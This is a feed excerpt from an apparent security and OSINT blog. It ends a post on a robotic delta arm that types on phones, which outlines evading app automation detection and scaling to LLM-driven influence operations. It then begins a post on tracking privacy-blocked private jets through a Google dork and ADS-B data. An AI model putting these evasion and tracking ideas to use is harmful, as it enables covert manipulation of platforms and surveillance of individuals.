  &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; i &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; i &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; points&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;length&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; i&lt;span class=&quot;token operator&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;setTimeout&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;point&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token function&quot;&gt;moveServosTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;point&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; point&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; point&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; i &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt; delay&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; points&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The moveServosTo function calculates the angles for three servos to reach a specified position (x, y, z) by first reflecting and rotating the input coordinates, then applying inverse kinematics to determine the appropriate servo angles. It maps these angles to the specific input-output range of each servo based on their configuration settings, commands the servos to move to these positions, and logs the calculated angles for monitoring purposes.&lt;/p&gt;
&lt;h2&gt;Mapping UI elements to delta arm position&lt;/h2&gt;
&lt;p&gt;One &lt;a href=&quot;https://medium.com/devs-foodit/iphone-automation-with-a-one-fingered-robot-a2936c840285&quot;&gt;article&lt;/a&gt; was particularly useful in helping map UI elements to the delta arm’s position. It recommended using a mobile app to display the coordinates of a finger or stylus on the screen. This task was relatively simple and printed the coordinates on an Android device when a touch event was detected.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/454b6cfb0c5a89ca70ca19521870bcd0/84a90/codeblock.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAABJ0AAASdAHeZh94AAACQ0lEQVQ4y41TS24TQRQcS4CQ59Pz//bYxh+FLSw4AEcAgYRYILFlwY4VIIKwo3CCsOIKnIEFR0BBXCAisEsUW/4U9RrbhDBItPT0eub11NSrem2pOIObd1CVHVwvK/TzAro/Qr/Xxw73padQKB++CnDpioUnj1/i3dMjjB98xu7dQ7y5/wVvH33F7p1DfPrwA5brOIiiGH4YwlUKrufxYw+K4fC5zbrtOvBchctXCfjwNQ7uzTC+fYTnN47x4uYxXt36jmc73/Dx/SkBCRDnJaIsR5xk0H6AbqWhdY1uR5iXJvI8g2VZ2NubQNYKSzQty7bJMPTZosZgOMJoOMRoNMJgMDBZaw2PP5UQwPF4bD5cLOZYrVZ/heWwJZ+sKsNKM1dI0xSauUOGJdkVRWH2cnZ/f98Azuf/AHRdF2EYENQ3+kk4fLdh5a73ITVutVqYTCaNgEYGA8jDSaFRRClSz0dGV0syzrOMuuWGbRzH5ofS8nnA82sDaomDgQqhvRgVjRn2ehh0uwiDX6wlFN1uApzNZphOp1gul78Zii6KbSV+aJhkZJWQlUcQaVXq5gyfLwI2tiyHA+rTJbO6rrdGJOs2RUOJJsDGlmWwPd4EL0ygosQYYsswS9j2fzPcuixtKZrg0AzleghkjBwXgexpknnHWkBNmwHxJ2C7bRtmaVWj5l2+lmbo0eGaOQqoqwT1jdLEjM1msC+2vL0pMh4FjTBXjMNcriPnMIs5GeuSC9ZFgs1gn5yc0uEZzs6mJkvM5wv8BITqY6Rx2gW2AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Code Block&quot;
        title=&quot;Code Block&quot;
        src=&quot;/static/454b6cfb0c5a89ca70ca19521870bcd0/fcda8/codeblock.png&quot;
        srcset=&quot;/static/454b6cfb0c5a89ca70ca19521870bcd0/12f09/codeblock.png 148w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/e4a3f/codeblock.png 295w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/fcda8/codeblock.png 590w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/efc66/codeblock.png 885w,
/static/454b6cfb0c5a89ca70ca19521870bcd0/84a90/codeblock.png 982w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The article describes a calibration routine that involves collecting two points on the screen. Assuming a consistent z-axis (up and down relative to the phone screen), it explains how these points can be used to determine every other coordinate on the screen through two-dimensional transformations.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/2d02242b8e59eec613daca8c6dfaa0ad/5aae9/matrix.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAABJ0AAASdAHeZh94AAABxklEQVQoz51T23KbMBD1//9T+thJJrFn2j503PiGAxiEQBckdOHWI2S3TZrJQ86MYFnt2V2dFat5nqdxmqYRxrggGsE9jsPQe++NtdM8zf9hhb2XNK1IxlhzqSpaU3gZb7x3nTFCsqf1/fP+WYgmlFnqAFeycy45nynNKSUFIYRS1FNadZ3mgg3j9Pj0dfvrJ2d0Ib+qH8hplrKmPCeHS1kwzr2zutPWGaW1836zeUiSI3aTJEnzvCjzuy933vdXcpZmhOSEFJeyrOvQHkcK761BFrXePJzOR0oL57wxxveeCx6lCeTD6QQy2k7LoiQVVGrbVmvNRIOgx/X9drd9v218S4VgCYX6wWutnEVC55cFctPUJSmHYXhHbSyEGWNNXMZ0XWetjRaMvu+RCE6lVPSjqZgrkFG3vqFBobpmmNvNgFlVFWxKqZQScsCAIlfyp3ElTzd8EDr9g7/kPy6cRAiBG3I47qUUQgqcE62m6Qva1kq/KfOqbWiT5Zls5fcf33BTKa1wYs7Zbr+jNJz5zbTC3YZgagEkHUb8Cj1aCJPyYV7WOiQNb2tjDJ4QHFlWcC3puVjQLoAHtlwgBLbCfoyJguMJ8m98jF7G+9AlWQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Matrix&quot;
        title=&quot;Matrix&quot;
        src=&quot;/static/2d02242b8e59eec613daca8c6dfaa0ad/fcda8/matrix.png&quot;
        srcset=&quot;/static/2d02242b8e59eec613daca8c6dfaa0ad/12f09/matrix.png 148w,
/static/2d02242b8e59eec613daca8c6dfaa0ad/e4a3f/matrix.png 295w,
/static/2d02242b8e59eec613daca8c6dfaa0ad/fcda8/matrix.png 590w,
/static/2d02242b8e59eec613daca8c6dfaa0ad/5aae9/matrix.png 610w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This approach didn’t work for me. I’m uncertain whether the issue was due to inconsistencies in my Tapsterbot build, such as slightly bent or unevenly sized arms, or whether the mathematics involved were too complex to be reduced to single plane calculation. Regardless, I encountered inaccuracies, particularly at the edges of the screen, which prevented Appium instructions from being accurately translated into the correct delta arm positions.&lt;/p&gt;
&lt;p&gt;The next step in addressing the challenges involved a more intricate calibration process. Initially, the corners of the screen’s coordinates were determined manually by moving the delta arm to each extremity. &lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/5bf6ec4aad6338f2420206306b510a41/5b587/calibration.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 45.27027027027027%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAIAAAC9o5sfAAAACXBIWXMAABJ0AAASdAHeZh94AAABW0lEQVQoz3WRW2+CQBCF+f+/pfWhiSbeoCI3E7WKlFS5o4EUKwIKVAvYg5uQtknnYTPMnm84M0tVVfV1j7Isbz8Cn0VR4Pb2f1BQeJ73cTj4vs8wjCRJoihyHGcYxm63C8MQItJCVVUWAkHgWVbk+RomP8HpOA5D0wBc153NZtPpFPUsyxoB0+9vRMFdvOC602qVVUU1jbfbrSzLeZ6naWrbtqIoKMIXGQq5xPPh+i21rMw0+MGgKMtf8Hw+P51OcRzruk5g5FEUnc9n5MJ4HKivsWkmusb2un9huE2SBGpN0whMDBMB4HdFiXQ93mzY7h3GBbyRmVer1eVygXPkGAFFGK7uUdvmuGi9zl3n0zK5Xq+GIcWegyDAejvtNvjlcsmORlg4Vr3f7wkP+Hk4nNC0PJksBP7p8QE1qnnn6/VqmiZaYGDLsuA/zepo3v94PGqGYVo2Ts/3UPkG187sduSec0UAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Calibration&quot;
        title=&quot;Calibration&quot;
        src=&quot;/static/5bf6ec4aad6338f2420206306b510a41/fcda8/calibration.png&quot;
        srcset=&quot;/static/5bf6ec4aad6338f2420206306b510a41/12f09/calibration.png 148w,
/static/5bf6ec4aad6338f2420206306b510a41/e4a3f/calibration.png 295w,
/static/5bf6ec4aad6338f2420206306b510a41/fcda8/calibration.png 590w,
/static/5bf6ec4aad6338f2420206306b510a41/efc66/calibration.png 885w,
/static/5bf6ec4aad6338f2420206306b510a41/5b587/calibration.png 1010w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;From there, a more automated approach was developed. Using the node server, the delta arm was programmatically guided to trace a grid pattern across the screen. This grid mapped the relationship between the delta arm’s movements and the corresponding points on the screen.&lt;/p&gt;
&lt;p&gt;By connecting to the device via ADB (Android Debug Bridge), the stylus positions were recorded at each point along the grid. This process allowed approximately 100 unique screen positions to be mapped to 100 corresponding delta arm positions.&lt;/p&gt;
&lt;p&gt;After the initial grid mapping, a period of experimentation with various algorithms was conducted to identify the most precise way to represent the relationship between the delta arm’s movements and the screen coordinates. The aim was to ensure the delta arm could achieve a high enough level of accuracy to replicate typing actions in Appium using the on-screen keyboard, making these interactions consistent and reliable on the actual device.&lt;/p&gt;
&lt;p&gt;Once a suitable algorithm was selected, the next step was to configure Appium to send commands that could convert screen instructions into delta arm positions, enabling the arm to type on the device. I modified Appium to integrate with the delta arm server, adding a command line flag to specify the server’s address.&lt;/p&gt;
&lt;p&gt;When this flag is provided, Appium redirects all gesture commands, which would typically go to the automation API, to the robot server through a REST API call. The server then translates these commands into delta arm movements, allowing the robot to perform the actions, such as typing, and reports the results back to Appium. This setup ensured seamless(-ish!) conversion of screen interactions into precise physical gestures executed by the delta arm.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;/5fc68957d2abd71bf426c3562f000091/arm.gif&quot; alt=&quot;arm&quot;&gt;&lt;/p&gt;
&lt;p&gt;Despite some occasional erratic movements—which were difficult to diagnose and troubleshoot—the system was largely successful. The delta arm could reliably type and interact with a wide range of social media platforms, effectively replicating typical user behaviours such as tapping, scrolling, and typing text.
During this project I experimented with the use of a “fire and forget” approach for interacting with the device - sending instrucions without the feedback bridge enabled by ADB. While it is possible to maintain a constant connection between Appium and the device via ADB, allowing real-time feedback on the delta arm’s movements, I suspected that, depending on the application’s permissions, detecting ADB activity could be relatively easy.&lt;/p&gt;
&lt;p&gt;Since ADB is often associated with automation or testing environments, certain apps might use this detection as a signal that automation is in play, which could trigger defensive measures, such as limiting functionality or altering the user interface. This would undermine the goal of mimicking natural human interactions undetected.&lt;/p&gt;
&lt;p&gt;While this approach was feasible, it became problematic with longer chains of interactions. For instance, when trying to type multiple social media posts or perform extended sequences of actions, the system’s reliability diminished. To maintain accuracy, it was necessary to begin each task from a known starting point, such as restarting the app or resetting the device to a specific screen. This allowed the delta arm to execute a single set of instructions without accumulating errors from previous interactions.&lt;/p&gt;
&lt;p&gt;I will hopefully find time for future experimentation, I suspect a solution for handling more complex interactions will involve using two devices. One device would remain connected to ADB, actively browsing social media applications and identifying posts to interact with. This device could leverage a language model (LLM) or similar AI to generate appropriate responses to posts. The second device—isolated from ADB to avoid detection—would be operated by the delta arm, executing the actual posting of the generated content.&lt;/p&gt;
&lt;p&gt;This setup could address the limitations of the current “fire and forget” approach by separating the content generation and interaction tasks. The ADB-connected device could handle the intelligence-heavy operations, such as parsing social media content, analysing sentiment, and determining the context for responding. Meanwhile, the non-bridged delta arm device would focus solely on the manual task of typing and posting, (hopefully) maintaining a lower profile by avoiding ADB activity that might be detected by the app. It would also be possible to randomise or replicate the time between button presses or the trajectory of a drag across the screen if these actions were detectable.&lt;/p&gt;
&lt;p&gt;In conclusion, while the challenges in developing an affordable system to automate social media interactions, at scale, using delta arms are significant, they don’t feel insurmountable. However, I lack the expertise to determine whether this approach would successfully evade detection over a longer period.
Scaling the process to operate with 5, 10, or even 100 delta arms could significantly reduce the barrier to entry for conducting semi-sophisticated influence operations without relying heavily on human labour. This approach could unlock new possibilities for managing information dissemination and efficiently countering disinformation. &lt;/p&gt;</content:encoded></item><item><title><![CDATA[OSINT for understanding blocked HNWI plane activity]]></title><description><![CDATA[Flights Introduction During an Open Source Intelligence (OSINT) investigation, there are occasions when tracking an aircraft associated with…]]></description><link>https://dfworks.com/blog/hnwi-osint-private-jet/</link><guid isPermaLink="false">https://dfworks.com/blog/hnwi-osint-private-jet/</guid><pubDate>Mon, 08 Jan 2024 12:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;img src=&quot;/e2ff11202ba3bf05849437626f79234e/planes_travel.gif&quot; alt=&quot;Flights&quot;&gt;&lt;/p&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;During an Open Source Intelligence (OSINT) investigation, there are occasions when tracking an aircraft associated with a particular individual or corporation becomes necessary. This tracking is made possible through flight data provided by platforms like &lt;a href=&quot;https://www.radarbox.com/&quot;&gt;RadarBox&lt;/a&gt; or &lt;a href=&quot;https://www.flightradar24.com/&quot;&gt;FlightRadar&lt;/a&gt;. These services access data from &lt;a href=&quot;https://en.wikipedia.org/wiki/Automatic_Dependent_Surveillance%E2%80%93Broadcast&quot;&gt;ADS-B&lt;/a&gt; nodes (ground stations monitoring aircraft radar signals) and display the trajectories and routes of various aircraft. Nonetheless, it’s not uncommon to find that data pertaining to specific planes is missing from these platforms. Often, this omission stems from legal demands made by High-Net-Worth-Individuals (HNWIs) prioritising their privacy, although it’s also a common practice for military or government flight information to be excluded from these datasets.&lt;/p&gt;
&lt;p&gt;This article analyses 275 aircraft that fit this criteria, featuring in RadarBox’s &lt;a href=&quot;https://www.radarbox.com/faq#tracking-and-ads-b:~:text=2.%20Why%20are%20some%20aircraft%20on%20the%20map%20labelled%20%E2%80%9Cblocked%E2%80%9D%3F&quot;&gt;blocked list&lt;/a&gt;. Utilising a dataset derived from a Google dork query, this analysis focuses on the 2023 flight paths of these aircraft, while also exploring ownership, co-location and other interesting trends.&lt;/p&gt;
&lt;h2&gt;Background&lt;/h2&gt;
&lt;p&gt;Aircraft tracking has been made possible by the advent of ADS-B which has been increasingly adopted in different jurisdictions since since the late 2000’s. This system, which relies on aircraft broadcasting their location, speed, and other data, has been a game-changer for both aviation professionals and enthusiasts. Websites like RadarBox and FlightTracker have capitalised on this technology to provide real-time tracking of aircraft around the globe. As mentioned, the data available on these platforms can sometimes be incomplete for various reasons, including legal aggression, especially from individuals or entities keen on keeping their travel details confidential. &lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;global.adsbexchange.com&quot;&gt;ADSbexchange&lt;/a&gt; stands out as a unique player in the flight data market, and is the resource used to complete this study. It is a network of hobbyists and enthusiasts who share a passion for aircraft tracking. This community-driven approach has fostered a more resilient ethos and the platform is less prone to censorship or removal requests, making it a great OSINT resource.&lt;/p&gt;
&lt;p&gt;The significance of flight data, both its accessibility and the efforts made to conceal it, is underscored in the financial trading sector. Traders have been known to leverage such information to forecast mergers and acquisitions. Analysis of these flights and their frequencies, especially to locations known for hosting corporate negotiations or legal consultations, can afford early insights into possible market-shifting events.&lt;/p&gt;
&lt;h2&gt;Google Dork&lt;/h2&gt;
&lt;p&gt;The Google Dork query &lt;strong&gt;site:radarbox.com “This aircraft is present on our blocked aircraft list”&lt;/strong&gt; was used as a starting point for the investigation. A Google Dork is a search technique that employs specific search strings to unearth information which might otherwise not rank highly in search engine results. In this case, the query is tailored to search within the domain of RadarBox for a specific phrase: “This aircraft is present on our blocked aircraft list”.&lt;/p&gt;
&lt;p&gt;What this query does is pinpoint the exact pages on RadarBox where aircraft are listed as ‘blocked’. These blocked listings are significant because they often relate to aircraft where flight details are deliberately concealed. These aircraft web pages were used to compile a dataset with the hope of identifying interesting patterns, such as frequent travel to certain destinations or co-location with other blocked aircraft. &lt;/p&gt;
&lt;h2&gt;Initial Analysis&lt;/h2&gt;
&lt;p&gt;As you might expect, patterns emerging from initial analysis are indicative of typical private aircraft use, particularly when considering the types of aircraft and their respective destinations. These patterns offer a glimpse into the travel habits and preferences of HNWIs.&lt;/p&gt;
&lt;p&gt;The dataset reveals a diverse range of aircraft manufacturers. However, certain brands stand out, indicating a preference for specific manufacturers known for their prestige. &lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/ff2777c43afc13d3c1b27cb72a8cb498/01e7c/manufacturers.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 70.94594594594594%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAAsSAAALEgHS3X78AAACNElEQVQoz3VSy24TMRTNmi9gxwKJT4AvgH+oumHLpmKBBGLDgg0gUQmxqAQFxEOIBagSrcSztEUtRZS2pCRKO82jSSYZjz1jz8vjmbHH4WZAIlHbs7he2Ofec851aVBAaw0VY9zpdhGyXdclGFOCkNXrmr2+hXgUDQ6hNEpWKpcyA4g0w168WLHqyBsMcuYSPwiPJRNCTNNkjCZSmzRtEvG96Z+68u701Q9TL8u1rgMt9HHkPM8HOg+FNOzYsAUOMzfMXm+Yl57+PDn19tzNpUovGD7T+ggyQOa6QYRhRaaF/zpUSoYUL2y1z1z/NDm7EXIOQXieh4s6RmY820OxH0sFtqWEESrXCg4pHi3vTr74tdVlkUcJcZIkgVzGyNV+uGOGY84Kkb7nlWvGzFprrcUSHlLGjpC9WqcrhiOEUFKOGoM5tf3meoMZmPMoDILgPxkEgAER8822/7GCehYSiRjdH7xu1o1yvW/7KXDhC4Bnx3Hgdkh2XZrEvOXE8zs2CoZmCre6GCt6nYPHbxan793vtNucc+ilCozJzlT+ZZc8WG9vtmyX2DpXkc985s5+rp6YeH7xzkKexnaRMzCllFBLI9EMrCCd/tq68X7v1ba5tO88WWtcm6+dvb16/tZyrUt9RjGGZQ0Bnwq6lKBB+A9RlsR915/7bd1daVyeq16Y+THxbPvht44bCubYtj20ihAC25ZlQZAlEEALeIy5lAawfa15qkwWH9C4T5hPiSrWfhh/ALjIAsSNR/VmAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Aircraft Manufacturers&quot;
        title=&quot;Aircraft Manufacturers&quot;
        src=&quot;/static/ff2777c43afc13d3c1b27cb72a8cb498/01e7c/manufacturers.png&quot;
        srcset=&quot;/static/ff2777c43afc13d3c1b27cb72a8cb498/12f09/manufacturers.png 148w,
/static/ff2777c43afc13d3c1b27cb72a8cb498/e4a3f/manufacturers.png 295w,
/static/ff2777c43afc13d3c1b27cb72a8cb498/01e7c/manufacturers.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Analysis of plane models within the dataset shows that high-end models, such as the Bombardier Global series, feature prominently. These models are renowned for their range and comfort aligning with the travel needs and expectations of HNWIs.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/5c0c9ab014e6e78f48c9693bf516b6da/01e7c/models.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 79.72972972972973%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAAAsSAAALEgHS3X78AAAB/ElEQVQoz21Su47TQBRNTcuH8C37F3wBzTaIjp6Ch7SUUJIiIJDQiopdJJpFu0nWTizs2BnH8dhje+aO5xXuJiKyk4wsezy+x+fcc89g019KKc/3J5NpFEVZlhFCkjieB4Hn+XVdY4Fzbl882O92p3gDEMF8ltMCWtUIKUCqtgUAbcwB06CLzHNKkkRqt6pNSFt/BbMMglymlVZboDsJ1lpzLpwx61peTtY/PDrPIKRyQSVuxkvupaIU+jSzUroqKWHi3VU4vElvwiLLC2wYFRm3oVwjeLLkNZhDMDaT57kx5v314vzz5PvtYk2WnPNuXQXmnoggA3tgmLEWmmq+qs4ufj8b3nn+rGKsa+zusSxbJK9A708ewEXJWs6+3aZPXly+HP1ZLyOle/J2pbU0dwnPKtUDcwEbLT/8/Pv46afnH3/RNNbGHoN5a9C5lLU92VXdQF0Mr4JHZ2/PX48Cf4yz7crGvqw1DPQJZkxVWRYko6/eXIy+fG04OGe7I2WMxfHCi4tpCo00PWb8LX62WkUkQ0tW9eE8cdFGjRMe5lIIIaU8jOdW3iZYwzhpFoXEDo1xxjqpLGHtdJsT0K4sCradRS+eO53K2JA+RAolzFYC43VPOL7ihrf2dMJ63roNehMXElXgFVGZN0r/N8G5PdERuOsT1nd9c0c0/wCFJZAuJdnfFgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Aircraft Models&quot;
        title=&quot;Aircraft Models&quot;
        src=&quot;/static/5c0c9ab014e6e78f48c9693bf516b6da/01e7c/models.png&quot;
        srcset=&quot;/static/5c0c9ab014e6e78f48c9693bf516b6da/12f09/models.png 148w,
/static/5c0c9ab014e6e78f48c9693bf516b6da/e4a3f/models.png 295w,
/static/5c0c9ab014e6e78f48c9693bf516b6da/01e7c/models.png 512w&quot;
        sizes=&quot;(max-width: 512px) 100vw, 512px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The countries of registration for these aircraft also tell a story. Certain jurisdictions may be favoured due to favourable tax regimes or privacy laws, which are factors often considered by affluent individuals and corporations.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 512px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/aaa15d04b65f0f467c67455af9165730/01e7c/countries.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 71.62162162162163%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAIAAACgpqunAAAACXBIWXMAAAsSAAALEgHS3X78AAAB00lEQVQoz4VTzW7TQBDOa3DmnbjwDpyRKkolDlyR6IE3QKKi4gBKKiFQhSjqJeAS2jqEJHYax7vrjX/W3rW9P2Ecp1VsRfBptdLOzjffzOxsZ9UEpdR1XeSjMAwJRpRgjBHCZO55QoiWc6d1VkrJsgIvJIr4YB4GjK+MBqtS+j9kAC+NS4sRFudOvN8bPv80en+JWaFWxiitd5PNeo+5vF5kvxEnrAwzaXnxmx/ek6796swJEh5grLf4DeVC6qHPJ0SUymxHvPCS/Z79+vu8nbZZQ+vKDcUlyHLIcE2DpSFVU111r9DBiT0Lq54ZswndSZLE932EEGPMofk0ELdXG+j12Qn50xP7bLq8s2yUoQzYoBljwm+WeSu32tOPxUHv+uOQNMjbfk6QQ8G6KV1XFAp1dBH8WiRGFhnnWZbled7Zbgx0+MrLmFC1IKw6UKHM6Zev5/2fcSomkzHMD8xSFEUNZanNH8zhndJC3SUMxmfHg3sPXh53P7M4cmczIO8eEmj1CHHbz0Y4u1wwKPLR28H9x72Hh9+cxZJSUkppbrFjwuC1CZP9GXtn+S9Ox3sf7KO+Vz2Kd0Pp8l/jWRefpSkiQZqrgAn4Fp4ztixrOnVazn8BSOYaKC7PyeIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Countries of Registration&quot;
        title=&quot;Countries of Registration&quot;
